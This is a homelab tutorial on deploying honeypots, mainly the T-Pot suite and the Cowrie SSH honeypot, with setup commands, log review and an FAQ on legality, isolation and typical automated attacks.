What Is a Homelab Honeypot?
A honeypot is a decoy service that lures attackers. Learn how to deploy honeypots in your homelab to detect intrusions, gather threat intelligence, and use popular tools like T-Pot.
1. What Is a Honeypot?
A <strong class="text-white">honeypot</strong> is a service designed to look like a real, valuable target — but it's actually a trap. Its purpose is to attract attackers, detect intrusion attempts, and study attacker behavior.
Unlike traditional security tools that block attacks, a honeypot <strong class="text-white">records everything an attacker does</strong>. Every login attempt, every command they run, every file they upload — all logged for analysis. This gives you real-world intelligence about who's probing your network and what techniques they're using.
2. Why Deploy a Honeypot in Your Homelab?
🔍 Early warning system
If someone probes your honeypot, you know your network is being scanned. This gives you time to investigate before a real attack succeeds.
🕵️ Threat intelligence
See exactly which IP addresses are attacking, what username/password combinations they're trying, and what exploitation techniques they use.
📊 Baseline your normal traffic
A honeypot on an unused IP (no legitimate traffic) should receive zero connections. Any hits = malicious scanning.
📚 Learn attacker techniques
Honeypots are a safe way to study how attackers operate — no risk to your real services.
🛡️ Complement your IDS
While IDS (Intrusion Detection System) looks for bad traffic on real services, a honeypot catches attackers that slip past — probing ports your IDS isn't monitoring.
3. Types of Honeypots
Honeypots range from simple to sophisticated:
| Type | Description | Complexity | Best For |
|---|---|---|---|
| Low-interaction | Simulates basic services (SSH, HTTP, FTP). Limited attacker interaction but safe and easy to deploy. | Low | Homelabs, beginners |
| High-interaction | Full real services or VMs. Attackers can do almost anything — provides deep insight but higher risk if compromised. | High | Advanced users, researchers |
| Production honeypots | Integrated into your real network to detect attackers early. Honeypots on unused IPs catch scanning. | Medium | Homelab security |
| Research honeypots | Academic or research deployments to study attacker behavior at scale. Long-term, high-fidelity. | Very High | Security researchers |
4. Deploy T-Pot (All-in-One Honeypot Suite)
<strong class="text-white">T-Pot</strong> is the most popular open-source honeypot framework. It runs 15+ honeypot services simultaneously in Docker containers, with a beautiful Kibana dashboard for analysis.
T-Pot includes: Cowrie (SSH/Telnet), Dionaea (malware honeypot), Honeypots for HTTP, SMTP, FTP, VNC, Redis, and more.
Allocate an unused IP on your network
T-Pot should run on an IP that has no legitimate services. This way, any connection to it is automatically suspicious. Configure your DHCP server to reserve this IP.
Install T-Pot on Ubuntu Server
T-Pot provides an ISO installer, but you can also install on Ubuntu Server using their installer script.
# Install T-Pot on Ubuntu 22.04/24.04
sudo apt-get update && sudo apt-get dist-upgrade -y
wget https://github.com/telekom-security/tpotce/releases/latest/download/tpot.iso
# T-Pot ISO is designed for fresh install — for Docker install, see T-Pot webinstall
# Docker-based install (recommended on existing Homelab):
git clone https://github.com/telekom-security/tpotce.git
cd tpotce
sudo ./install.sh --type=userConfigure T-Pot
After installation, access the T-Pot web interface (Kibana dashboard) at https://your-tpot-ip:64297. Default credentials are in /opt/tpot/etc/tpot.yml.
# Default web credentials
username: admin
password: (check /opt/tpot/etc/tpot.yml)
# Access Kibana dashboard
https://192.168.1.xx:64297Let it run and watch
T-Pot will start capturing attacks immediately. Within hours to days, you'll see brute-force SSH attempts, port scans, and exploitation attempts against simulated services. Review the attacks in Kibana — filter by source IP, honeypot type, and attack type.
5. Deploy Cowrie (SSH/Telnet Honeypot)
If T-Pot is too heavy, <strong class="text-white">Cowrie</strong> is an excellent lightweight SSH honeypot. It simulates a fake Linux server with SSH and records every command the attacker runs.
Cowrie is perfect for a Homelab because it's easy to deploy, runs in Docker, and provides highly detailed logs of attacker behavior.
Deploy Cowrie in Docker
Run Cowrie as a Docker container. Change the SSH port on your real server to something else, then redirect port 22 to Cowrie.
docker run -d \
--name cowrie \
-p 2222:2222 \
-p 23:23 \
-v cowrie-data:/cowrie/data \
-v cowrie-log:/cowrie/log \
--restart unless-stopped \
cowrie/cowrie:latestRedirect SSH traffic to Cowrie
Change your real SSH to a different port, then redirect port 22 to Cowrie.
# Change real SSH port
sudo sed -i "s/#Port 22/Port 22222/" /etc/ssh/sshd_config
sudo systemctl restart sshd
# Redirect port 22 → Cowrie
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222Check Cowrie logs
Cowrie logs all attacker commands and downloaded files. Review them regularly.
# View attacker sessions
docker exec cowrie cat /cowrie/log/tty/$(ls -t /cowrie/log/tty/ | head -1)
# View cowrie logs
docker exec cowrie cat /cowrie/log/cowrie.log | tail -50
# Attackers typically try common root/admin logins:
grep "login attempt" /cowrie/log/cowrie.log | grep -oE "root|admin|ubuntu|user|test" | sort | uniq -c | sort -rnWatch what attackers actually do
The first thing most attackers do after logging in is run: wget/curl to download a script, chmod +x, and execute it. Cowrie captures all of this. You'll see exactly what malware they try to install on your fake server.
Frequently Asked Questions
Is a honeypot legal?
Running a honeypot is generally legal in most jurisdictions as long as you're only monitoring (not entrapment) on your own network. You're not enticing people to attack — you're observing attacks on a decoy service. However, recording attacker IP addresses may have privacy implications depending on your local laws. Consult legal advice if you're deploying at scale or in a commercial environment.
Can a honeypot be used to attack me?
A well-configured honeypot cannot be used to attack others. Honeypots only accept connections — they don't initiate outbound connections to external systems (unless you configure them to). Low-interaction honeypots like Cowrie are specifically designed to be safe — they simulate services but don't execute attacker commands as privileged users.
How do I know if a honeypot is being attacked?
On a honeypot with no legitimate traffic (like an unused IP), any connection is suspicious. If you run a honeypot on port 22 (SSH) on your real IP, expect thousands of automated attacks within 24 hours — this is normal. If you suddenly stop seeing attacks on a honeypot that previously had them, an attacker may have noticed and moved on.
Should I deploy a honeypot in my DMZ or Homelab VLAN?
Best practice: deploy a honeypot on a dedicated VLAN with its own firewall rules, isolated from both your DMZ and Homelab VLAN. The honeypot should only have internet access, not internal network access. Even if an attacker escapes the honeypot (rare but possible with high-interaction honeypots), they're contained in their own isolated VLAN.
What do attackers usually try on SSH honeypots?
The vast majority of SSH honeypot attacks are automated: (1) Brute-force common username/password combinations (root/admin/ubuntu), (2) Download and execute malware scripts (cryptominers are most common), (3) Set up persistent backdoors. Very few are targeted human attacks — automated bots account for 99%+ of honeypot traffic.